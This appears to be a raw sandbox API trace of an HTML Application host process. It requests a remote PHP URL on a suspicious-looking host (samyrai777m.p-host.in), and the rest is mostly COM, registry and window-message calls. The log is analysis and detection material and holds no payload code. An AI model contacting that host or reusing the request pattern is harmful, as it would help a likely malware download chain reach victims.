[0063.821] GetCurrentThreadId () returned 0xbcc
[0063.822] GetCursorPos (in: lpPoint=0x14ed90 | out: lpPoint=0x14ed90*(x=724, y=422)) returned 1
[0063.822] GetKeyState (nVirtKey=16) returned 0
[0063.822] GetKeyState (nVirtKey=17) returned 0
[0063.822] GetKeyState (nVirtKey=18) returned 0
[0063.822] GetKeyState (nVirtKey=160) returned 0
[0063.822] GetKeyState (nVirtKey=162) returned 0
[0063.822] GetKeyState (nVirtKey=164) returned 0
[0063.824] GetProcAddress (hModule=0x7fefde70000, lpProcName=0x8) returned 0x7fefde713f0
[0063.824] GetCurrentThreadId () returned 0xbcc
[0063.824] ParseURLW (in: pcszURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppu=0x14f020 | out: ppu=0x14f020) returned 0x0
[0063.824] CreateUri (in: pwzURI="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x14efe0 | out: ppURI=0x14efe0*=0x30e180) returned 0x0
[0063.825] IUnknown:AddRef (This=0x30e180) returned 0xd
[0063.825] IInternetSecurityManager:SetSecuritySite (This=0x7fee1042708, pSite=0x2fafb0) returned 0x800c0011
[0063.825] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0063.825] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0063.825] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0063.825] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fee1042708, pwszUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwAction=0x2700, pPolicy=0x14ef90, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x14ef90*=0x0) returned 0x0
[0063.825] IUnknown:Release (This=0x30e180) returned 0xc
[0063.825] IUnknown:Release (This=0x30e180) returned 0xb
[0063.825] IUnknown:AddRef (This=0x30e180) returned 0xc
[0063.825] IUri:GetPropertyDWORD (in: This=0x30e180, uriProp=0x11, pdwProperty=0x14edd8, dwFlags=0x0 | out: pdwProperty=0x14edd8*=0x2) returned 0x0
[0063.825] IInternetSecurityManager:GetSecurityId (in: This=0x3212c0, pwszUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", pbSecurityId=0x14ee70, pcbSecurityId=0x14ee60*=0x200, dwReserved=0x0 | out: pbSecurityId=0x14ee70*=0x68, pcbSecurityId=0x14ee60*=0x22) returned 0x0
[0063.825] IInternetSecurityManager:SetSecuritySite (This=0x7fee1042708, pSite=0x2f5448) returned 0x800c0011
[0063.825] IUnknown:Release (This=0x30e180) returned 0xb
[0063.825] CoInternetGetSession (in: dwSessionMode=0x0, ppIInternetSession=0x14f0a0, dwReserved=0x0 | out: ppIInternetSession=0x14f0a0*=0x324ce0) returned 0x0
[0063.825] IInternetSession:RegisterNameSpace (This=0x324ce0, pCF=0x7fee1044f60, rclsid=0x7fee0f21b30, pwzProtocol="res", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0
[0063.826] IUnknown:AddRef (This=0x7fee1044f60) returned 0x1
[0063.826] IInternetSession:RegisterNameSpace (This=0x324ce0, pCF=0x7fee1044fa0, rclsid=0x7fee0f21b10, pwzProtocol="about", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0
[0063.826] IUnknown:AddRef (This=0x7fee1044fa0) returned 0x1
[0063.826] StrCmpICW (pszStr1="http://www.samyrai777m.p-host.in/t/t.php", pszStr2="res://ieframe.dll/PhishSite.htm") returned -10
[0063.826] IUnknown:QueryInterface (in: This=0x30e180, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14ef90 | out: ppvObject=0x14ef90*=0x30e180) returned 0x0
[0063.827] IUnknown:Release (This=0x30e180) returned 0xb
[0063.827] IUnknown:AddRef (This=0x30e180) returned 0xc
[0063.855] IUnknown:AddRef (This=0x30e180) returned 0xd
[0063.855] IUnknown:QueryInterface (in: This=0x30e180, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14ef00 | out: ppvObject=0x14ef00*=0x30e180) returned 0x0
[0063.855] IUnknown:Release (This=0x30e180) returned 0xd
[0063.855] IUnknown:AddRef (This=0x30e180) returned 0xe
[0063.855] IUnknown:Release (This=0x30e180) returned 0xd
[0063.855] IUri:GetScheme (in: This=0x30e180, pdwScheme=0x14f010 | out: pdwScheme=0x14f010*=0x2) returned 0x0
[0063.855] PostMessageW (hWnd=0x10204, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1
[0063.855] IUnknown:AddRef (This=0x30e180) returned 0xe
[0063.855] IUnknown:QueryInterface (in: This=0x30e180, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14ef00 | out: ppvObject=0x14ef00*=0x30e180) returned 0x0
[0063.855] IUnknown:Release (This=0x30e180) returned 0xe
[0063.855] IUnknown:AddRef (This=0x30e180) returned 0xf
[0063.856] IUnknown:QueryInterface (in: This=0x30e180, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14eaf0 | out: ppvObject=0x14eaf0*=0x30e180) returned 0x0
[0063.856] IUnknown:Release (This=0x30e180) returned 0xf
[0063.856] IUnknown:AddRef (This=0x30e180) returned 0x10
[0063.856] IUnknown:AddRef (This=0x30e180) returned 0x11
[0063.856] IUnknown:AddRef (This=0x30e180) returned 0x12
[0063.856] IUnknown:QueryInterface (in: This=0x30e180, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14eac0 | out: ppvObject=0x14eac0*=0x30e180) returned 0x0
[0063.856] IUnknown:Release (This=0x30e180) returned 0x12
[0063.856] IUnknown:AddRef (This=0x30e180) returned 0x13
[0063.856] IUri:GetScheme (in: This=0x30e180, pdwScheme=0x352668 | out: pdwScheme=0x352668*=0x2) returned 0x0
[0063.856] IMoniker:IsSystemMoniker (in: This=0x2f5140, pdwMksys=0x14eb50 | out: pdwMksys=0x14eb50*=0x6) returned 0x0
[0063.856] IUnknown:QueryInterface (in: This=0x30e180, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14eaf0 | out: ppvObject=0x14eaf0*=0x30e180) returned 0x0
[0063.856] IUnknown:Release (This=0x30e180) returned 0x13
[0063.856] IUnknown:AddRef (This=0x30e180) returned 0x14
[0063.896] IInternetSession:CreateBinding (in: This=0x324ce0, pbc=0x0, szUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", pUnkOuter=0x0, ppunk=0x0, ppOInetProt=0x353ac0, dwOption=0x0 | out: ppunk=0x0, ppOInetProt=0x353ac0*=0x355f00) returned 0x0
[0063.897] IUnknown:QueryInterface (in: This=0x355f00, riid=0x7fee0f84860*(Data1=0x53c84785, Data2=0x8425, Data3=0x4dc5, Data4=([0]=0x97, [1]=0x1b, [2]=0xe5, [3]=0x8d, [4]=0x9c, [5]=0x19, [6]=0xf9, [7]=0xb6)), ppvObject=0x14ea60 | out: ppvObject=0x14ea60*=0x0) returned 0x80004002
[0063.897] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14e978 | out: phkResult=0x14e978*=0x390) returned 0x0
[0063.897] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14e980 | out: phkResult=0x14e980*=0x394) returned 0x0
[0063.897] RegOpenKeyExW (in: hKey=0x394, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x14e908 | out: phkResult=0x14e908*=0x0) returned 0x2
[0063.897] RegOpenKeyExW (in: hKey=0x390, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x14e908 | out: phkResult=0x14e908*=0x398) returned 0x0
[0063.897] SHRegGetValueW () returned 0x2
[0063.897] SHRegGetValueW () returned 0x2
[0063.897] RegCloseKey (hKey=0x398) returned 0x0
[0063.897] RegCloseKey (hKey=0x0) returned 0x6
[0063.897] RegCloseKey (hKey=0x0) returned 0x6
[0063.897] RegCloseKey (hKey=0x390) returned 0x0
[0063.897] RegCloseKey (hKey=0x394) returned 0x0
[0063.897] IUnknown:AddRef (This=0x355f00) returned 0x2
[0063.912] IUnknown:QueryInterface (in: This=0x355f00, riid=0x7fee0fdb188*(Data1=0xc7a98e66, Data2=0x1010, Data3=0x492c, Data4=([0]=0xa1, [1]=0xc8, [2]=0xc8, [3]=0x9, [4]=0xe1, [5]=0xf7, [6]=0x59, [7]=0x5)), ppvObject=0x14ea90 | out: ppvObject=0x14ea90*=0x355f00) returned 0x0
[0063.912] IInternetProtocolEx:StartEx (This=0x355f00, pUri=0x30e180, pOIProtSink=0x352530, pOIBindInfo=0x3524c0, grfPI=0x10, dwReserved=0x0) returned 0x0
[0063.912] IUnknown:AddRef (This=0x352530) returned 0x3
[0063.930] IInternetBindInfo:GetBindInfo (in: This=0x3524c0, grfBINDF=0x356128, pbindinfo=0x356130 | out: grfBINDF=0x356128*=0x20083, pbindinfo=0x356130) returned 0x0
[0063.931] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14e888 | out: phkResult=0x14e888*=0x3a8) returned 0x0
[0063.931] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14e890 | out: phkResult=0x14e890*=0x3ac) returned 0x0
[0063.931] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x14e818 | out: phkResult=0x14e818*=0x0) returned 0x2
[0063.931] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x14e818 | out: phkResult=0x14e818*=0x0) returned 0x2
[0063.931] RegCloseKey (hKey=0x0) returned 0x6
[0063.931] RegCloseKey (hKey=0x0) returned 0x6
[0063.931] RegCloseKey (hKey=0x3a8) returned 0x0
[0063.931] RegCloseKey (hKey=0x3ac) returned 0x0
[0063.931] IUnknown:AddRef (This=0x352530) returned 0x5
[0063.931] IInternetProtocolSink:ReportProgress (This=0x352530, ulStatusCode=0x1e, szStatusText=0x0) returned 0x0
[0064.110] IInternetBindInfo:GetBindString (in: This=0x3524c0, ulStringType=0x2, ppwzStr=0x14e0c0, cEl=0x100, pcElFetched=0x14e8f0*=0x100 | out: ppwzStr=0x14e0c0*="*/*", pcElFetched=0x14e8f0*=0x1) returned 0x0
[0064.110] CoTaskMemAlloc (cb=0x8) returned 0x30df90
[0064.110] IUnknown:QueryInterface (in: This=0x352530, riid=0x7fefe4b1918*(Data1=0x58dfc7d0, Data2=0x5381, Data3=0x43e5, Data4=([0]=0x9d, [1]=0x72, [2]=0x4c, [3]=0xdd, [4]=0xe4, [5]=0xcb, [6]=0xf, [7]=0x1a)), ppvObject=0x14e908 | out: ppvObject=0x14e908*=0x0) returned 0x80004002
[0064.111] IUnknown:QueryInterface (in: This=0x352530, riid=0x7fefe4ae970*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x356038 | out: ppvObject=0x356038*=0x3524b0) returned 0x0
[0064.111] IServiceProvider:QueryService (in: This=0x3524b0, guidService=0x7fefe4af090*(Data1=0x79eac9d2, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7fefe4af090*(Data1=0x79eac9d2, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x356290 | out: ppvObject=0x356290*=0x3524b8) returned 0x0
[0064.111] IHttpNegotiate:BeginningTransaction (in: This=0x3524b8, szUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", szHeaders="UA-CPU: AMD64\r\nAccept-Encoding: gzip, deflate", dwReserved=0x0, pszAdditionalHeaders=0x14d5e0 | out: pszAdditionalHeaders=0x14d5e0*="Accept-Language: en-US\r\n") returned 0x0
[0064.111] CreateUri (in: pwzURI="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x14d4a0 | out: ppURI=0x14d4a0*=0x30e180) returned 0x0
[0064.111] IUnknown:AddRef (This=0x30e180) returned 0x19
[0064.111] IUnknown:QueryInterface (in: This=0x30e180, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14d450 | out: ppvObject=0x14d450*=0x30e180) returned 0x0
[0064.111] IUnknown:Release (This=0x30e180) returned 0x19
[0064.111] IUnknown:AddRef (This=0x30e180) returned 0x1a
[0064.111] CoTaskMemAlloc (cb=0x32) returned 0x36ecc0
[0064.138] IUnknown:Release (This=0x30e180) returned 0x19
[0064.138] IServiceProvider:QueryService (in: This=0x3524b0, guidService=0x7fefe4af170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x7fefe4af170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x3562c8 | out: ppvObject=0x3562c8*=0x3524b8) returned 0x0
[0064.138] IHttpNegotiate2:GetRootSecurityId (in: This=0x3524b8, pbSecurityId=0x14d630, pcbSecurityId=0x356270*=0x200, dwReserved=0x0 | out: pbSecurityId=0x14d630*=0x40, pcbSecurityId=0x356270*=0x200) returned 0x80004005
[0064.139] IUnknown:Release (This=0x355f00) returned 0x4
[0064.139] IUnknown:Release (This=0x30e180) returned 0x17
[0064.139] IUnknown:Release (This=0x30e180) returned 0x16
[0064.139] IUnknown:Release (This=0x30e180) returned 0x15
[0064.139] CoTaskMemFree (pv=0x0)
[0064.139] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ee80 | out: lpCPInfo=0x14ee80) returned 1
[0064.139] IUnknown:AddRef (This=0x324ce0) returned 0x3
[0064.139] IUnknown:AddRef (This=0x30e180) returned 0x16
[0064.139] IUnknown:QueryInterface (in: This=0x30e180, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14eec0 | out: ppvObject=0x14eec0*=0x30e180) returned 0x0
[0064.139] IUnknown:Release (This=0x30e180) returned 0x16
[0064.139] IUnknown:AddRef (This=0x30e180) returned 0x17
[0064.139] IUri:GetScheme (in: This=0x30e180, pdwScheme=0x14eef0 | out: pdwScheme=0x14eef0*=0x2) returned 0x0
[0064.139] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x210
[0064.139] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7fee08905f0, lpParameter=0x3580f0, dwCreationFlags=0x0, lpThreadId=0x358110 | out: lpThreadId=0x358110*=0x83c) returned 0x3e4
[0064.139] GetCurrentThreadId () returned 0xbcc
[0064.140] IUnknown:Release (This=0x30e180) returned 0x16
[0064.140] IUnknown:Release (This=0x30e180) returned 0x15
[0064.140] IUnknown:Release (This=0x2f5140) returned 0x3
[0064.140] IUnknown:Release (This=0x30e180) returned 0x14
[0064.140] IUnknown:Release (This=0x30e180) returned 0x13
[0064.140] IUnknown:Release (This=0x30e180) returned 0x12
[0064.140] IUnknown:Release (This=0x2f5140) returned 0x2
[0064.140] IUnknown:Release (This=0x30e180) returned 0x11
[0064.140] CoTaskMemFree (pv=0x2fb640)
[0064.140] CoTaskMemFree (pv=0x0)
[0064.140] IUnknown:Release (This=0x30e180) returned 0x10
[0064.140] CoTaskMemFree (pv=0x2fb5d0)
[0064.140] GetClientRect (in: hWnd=0x10200, lpRect=0x14f8b0 | out: lpRect=0x14f8b0) returned 1
[0064.142] GetClientRect (in: hWnd=0x10200, lpRect=0x329088 | out: lpRect=0x329088) returned 1
[0064.142] OffsetRect (in: lprc=0x329088, dx=0, dy=0 | out: lprc=0x329088) returned 1
[0064.142] OffsetRect (in: lprc=0x329098, dx=0, dy=0 | out: lprc=0x329098) returned 1
[0064.142] RegisterClassExW (param_1=0x14f160) returned 0xc199
[0064.142] CoCreateInstance (in: rclsid=0x7fee0f37850*(Data1=0x50d5107a, Data2=0xd278, Data3=0x4871, Data4=([0]=0x89, [1]=0x89, [2]=0xf4, [3]=0xce, [4]=0xaa, [5]=0xf5, [6]=0x9c, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x401, riid=0x7fee0f2b760*(Data1=0x8c0e040, Data2=0x62d1, Data3=0x11d1, Data4=([0]=0x93, [1]=0x26, [2]=0x0, [3]=0x60, [4]=0xb0, [5]=0x67, [6]=0xb8, [7]=0x6e)), ppv=0x7fee1044320 | out: ppv=0x7fee1044320*=0x36f340) returned 0x0
[0064.229] CActiveIMMAppEx_Trident:IActiveIMMApp:FilterClientWindows (This=0x36f340, aaClassList=0x14f2e0*=0xc199, uSize=0x1) returned 0x0
[0064.229] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc199, lpWindowName=0x0, dwStyle=0x46000000, X=0, Y=0, nWidth=1064, nHeight=587, hWndParent=0x10200, hMenu=0x0, hInstance=0x7fee0880000, lpParam=0x31d790) returned 0x10208
[0064.229] GetWindowLongW (hWnd=0x10208, nIndex=-20) returned 0
[0064.229] SetWindowLongPtrW (hWnd=0x10208, nIndex=-21, dwNewLong=0x31d790) returned 0x0
[0064.246] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x81, wParam=0x0, lParam=0x14ecd0*=3266448, plResult=0x14ea90 | out: plResult=0x14ea90) returned 0x1
[0064.248] NtdllDefWindowProc_W () returned 0x1
[0064.250] GetCurrentThreadId () returned 0xbcc
[0064.250] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0064.250] GetCurrentThreadId () returned 0xbcc
[0064.250] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0064.250] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x1, wParam=0x0, lParam=0x14ecd0*=3266448, plResult=0x14ea90 | out: plResult=0x14ea90) returned 0x1
[0064.250] NtdllDefWindowProc_W () returned 0x0
[0064.250] GetCurrentThreadId () returned 0xbcc
[0064.250] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0064.250] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x5, wParam=0x0, lParam=0x24b0428, plResult=0x14eb10 | out: plResult=0x14eb10) returned 0x1
[0064.250] NtdllDefWindowProc_W () returned 0x0
[0064.250] GetCurrentThreadId () returned 0xbcc
[0064.250] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0064.250] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x3, wParam=0x0, lParam=0x0, plResult=0x14eb10 | out: plResult=0x14eb10) returned 0x1
[0064.250] NtdllDefWindowProc_W () returned 0x0
[0064.250] GetCurrentThreadId () returned 0xbcc
[0064.250] GetClassNameW (in: hWnd=0x10200, lpClassName=0x14f2f0, nMaxCount=256 | out: lpClassName="HTML Application Host Window Class") returned 34
[0064.250] StrCmpIW (psz1="HTML Application Host Window Class", psz2="HTMLPageDesignerWndClass") returned -1
[0064.250] CActiveIMMAppEx_Trident:IActiveIMMApp:Activate (This=0x36f340, fRestoreLayout=1) returned 0x0
[0064.250] SendMessageW (hWnd=0x10208, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3
[0064.250] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0064.250] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x129, wParam=0x0, lParam=0x0, plResult=0x14f0c0 | out: plResult=0x14f0c0) returned 0x1
[0064.250] NtdllDefWindowProc_W () returned 0x3
[0064.250] GetCurrentThreadId () returned 0xbcc
[0064.251] IntersectRect (in: lprcDst=0x14f580, lprcSrc1=0x329088, lprcSrc2=0x329098 | out: lprcDst=0x14f580) returned 1
[0064.251] EqualRect (lprc1=0x14f580, lprc2=0x329088) returned 1
[0064.251] InvalidateRect (hWnd=0x10208, lpRect=0x0, bErase=1) returned 1
[0064.251] IntersectRect (in: lprcDst=0x14f410, lprcSrc1=0x14f410, lprcSrc2=0x14f380 | out: lprcDst=0x14f410) returned 1
[0064.251] IntersectRect (in: lprcDst=0x14f410, lprcSrc1=0x14f410, lprcSrc2=0x14f380 | out: lprcDst=0x14f410) returned 1
[0064.252] GetCurrentThreadId () returned 0xbcc
[0064.252] GetCurrentThreadId () returned 0xbcc
[0064.252] GetCurrentThreadId () returned 0xbcc
[0064.252] IntersectRect (in: lprcDst=0x14f190, lprcSrc1=0x14f190, lprcSrc2=0x14f160 | out: lprcDst=0x14f190) returned 1
[0064.252] IntersectRect (in: lprcDst=0x374fc0, lprcSrc1=0x374fc0, lprcSrc2=0x14f180 | out: lprcDst=0x374fc0) returned 1
[0064.256] SetWindowPos (hWnd=0x10208, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x5f) returned 1
[0064.256] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0064.256] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x46, wParam=0x0, lParam=0x14f580*=66056, plResult=0x14f370 | out: plResult=0x14f370) returned 0x1
[0064.256] NtdllDefWindowProc_W () returned 0x0
[0064.256] GetCurrentThreadId () returned 0xbcc
[0064.256] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0064.256] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x47, wParam=0x0, lParam=0x14f580*=66056, plResult=0x14f370 | out: plResult=0x14f370) returned 0x1
[0064.256] NtdllDefWindowProc_W () returned 0x0
[0064.256] GetCurrentThreadId () returned 0xbcc
[0064.256] SetTimer (hWnd=0x10208, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000
[0064.296] GetFocus () returned 0x0
[0064.296] EnumChildWindows (hWndParent=0x10208, lpEnumFunc=0x7fee09de450, lParam=0x14f2f0) returned 0
[0064.296] GetFocus () returned 0x0
[0064.296] SetFocus (hWnd=0x10208) returned 0x0
[0064.297] NtdllDefWindowProc_W () returned 0x0
[0064.302] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0064.302] LoadLibraryA (lpLibFileName="OLEACC.DLL") returned 0x7fef22f0000
[0064.305] GetProcAddress (hModule=0x7fef22f0000, lpProcName="LresultFromObject") returned 0x7fef22f3aa8
[0064.305] LresultFromObject () returned 0xc11f
[0064.336] GetCurrentThreadId () returned 0xbcc
[0064.362] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0064.362] GetKeyState (nVirtKey=1) returned 0
[0064.362] GetKeyState (nVirtKey=2) returned 0
[0064.362] GetKeyState (nVirtKey=16) returned 0
[0064.362] GetKeyState (nVirtKey=17) returned 0
[0064.362] GetKeyState (nVirtKey=4) returned 0
[0064.362] GetKeyState (nVirtKey=18) returned 0
[0064.362] GetMessageTime () returned 0
[0064.362] GetMessagePos () returned 0x0
[0064.362] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x14e860 | out: plResult=0x14e860) returned 0x0
[0064.363] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0064.363] GetKeyState (nVirtKey=1) returned 0
[0064.364] GetKeyState (nVirtKey=2) returned 0
[0064.364] GetKeyState (nVirtKey=16) returned 0
[0064.364] GetKeyState (nVirtKey=17) returned 0
[0064.364] GetKeyState (nVirtKey=4) returned 0
[0064.364] GetKeyState (nVirtKey=18) returned 0
[0064.364] GetMessageTime () returned 0
[0064.364] GetMessagePos () returned 0x0
[0064.364] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x14dec0 | out: plResult=0x14dec0) returned 0x0
[0064.364] GetCurrentThreadId () returned 0xbcc
[0064.364] GetCurrentThreadId () returned 0xbcc
[0064.364] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0064.364] GetKeyState (nVirtKey=1) returned 0
[0064.364] GetKeyState (nVirtKey=2) returned 0
[0064.364] GetKeyState (nVirtKey=16) returned 0
[0064.364] GetKeyState (nVirtKey=17) returned 0
[0064.364] GetKeyState (nVirtKey=4) returned 0
[0064.364] GetKeyState (nVirtKey=18) returned 0
[0064.364] GetMessageTime () returned 0
[0064.364] GetMessagePos () returned 0x0
[0064.364] GetCursorPos (in: lpPoint=0x14ec40 | out: lpPoint=0x14ec40*(x=724, y=422)) returned 1
[0064.364] ScreenToClient (in: hWnd=0x10208, lpPoint=0x14ec40 | out: lpPoint=0x14ec40) returned 1
[0064.364] GetKeyState (nVirtKey=16) returned 0
[0064.364] GetKeyState (nVirtKey=17) returned 0
[0064.364] GetKeyState (nVirtKey=18) returned 0
[0064.364] GetKeyState (nVirtKey=160) returned 0
[0064.364] GetKeyState (nVirtKey=162) returned 0
[0064.364] GetKeyState (nVirtKey=164) returned 0
[0064.364] GetCursorPos (in: lpPoint=0x14ec40 | out: lpPoint=0x14ec40*(x=724, y=422)) returned 1
[0064.364] ScreenToClient (in: hWnd=0x10208, lpPoint=0x14ec40 | out: lpPoint=0x14ec40) returned 1
[0064.364] GetKeyState (nVirtKey=16) returned 0
[0064.364] GetKeyState (nVirtKey=17) returned 0
[0064.364] GetKeyState (nVirtKey=18) returned 0
[0064.364] GetKeyState (nVirtKey=160) returned 0
[0064.364] GetKeyState (nVirtKey=162) returned 0
[0064.364] GetKeyState (nVirtKey=164) returned 0
[0064.365] GetCapture () returned 0x0
[0064.366] GetCurrentThreadId () returned 0xbcc
[0064.366] GetCurrentThreadId () returned 0xbcc
[0064.366] GetCurrentThreadId () returned 0xbcc
[0064.366] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x14efe0 | out: plResult=0x14efe0) returned 0x1
[0064.366] NtdllDefWindowProc_W () returned 0x0
[0064.366] GetCurrentThreadId () returned 0xbcc
[0064.366] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x36f340, hWnd=0x10208, phIMC=0x14f4a8 | out: phIMC=0x14f4a8*=0x80085) returned 0x0
[0064.366] CActiveIMMAppEx_Trident:IActiveIMMApp:AssociateContext (in: This=0x36f340, hWnd=0x10208, hIME=0x0, phPrev=0x14f4b0 | out: phPrev=0x14f4b0*=0x80085) returned 0x0
[0064.367] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0064.367] GetKeyState (nVirtKey=1) returned 0
[0064.367] GetKeyState (nVirtKey=2) returned 0
[0064.367] GetKeyState (nVirtKey=16) returned 0
